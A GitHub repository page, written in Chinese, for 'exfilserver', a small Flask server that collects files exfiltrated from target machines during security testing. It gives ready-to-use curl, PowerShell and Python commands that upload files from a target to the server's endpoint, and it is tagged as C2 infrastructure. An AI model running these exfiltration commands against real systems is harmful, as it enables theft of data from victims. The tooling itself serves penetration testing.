phor3nsic/exfilserver
GitHub: phor3nsic/exfilserver
一个轻量级 Flask 服务端,用于在安全测试中通过 curl、PowerShell 或 Python 接收从目标环境上传的文件。
Stars: 2 | Forks: 0
# 📭 Exfilserver
### 在你的服务器上运行:
```
pip install Flask \
python3 server.py -p 80 -f /tmp/files
```
### 从发送端上传:
```
curl -X POST -F "file=@./file" http://:80/exf
```
```
$FilePath = "C:\Users\Public\teste.txt"
$Url = "http://127.0.0.1:80/exf"
Invoke-WebRequest -Uri $Url -Method Post -InFile $FilePath -ContentType "multipart/form-data"
```
```
import requests
import sys
def upload_file(server_url, file_path):
url = f"{server_url}/exf"
try:
with open(file_path, 'rb') as f:
files = {'file': (file_path, f)}
response = requests.post(url, files=files)
print(f"[*] Status: {response.status_code}")
print(f"[*] Response of server: {response.text}")
except Exception as e:
print(f"[!] Error to send file: {e}")
if __name__ == "__main__":
if len(sys.argv) != 3:
print(f"Usage: python {sys.argv[0]} ")
sys.exit(1)
server_url = sys.argv[1] # example: http://127.0.0.1:80
file_path = sys.argv[2]
upload_file(server_url, file_path)
```
标签:C2基础设施, Flask, 数据外发, 文件传输, 网络信息收集, 逆向工具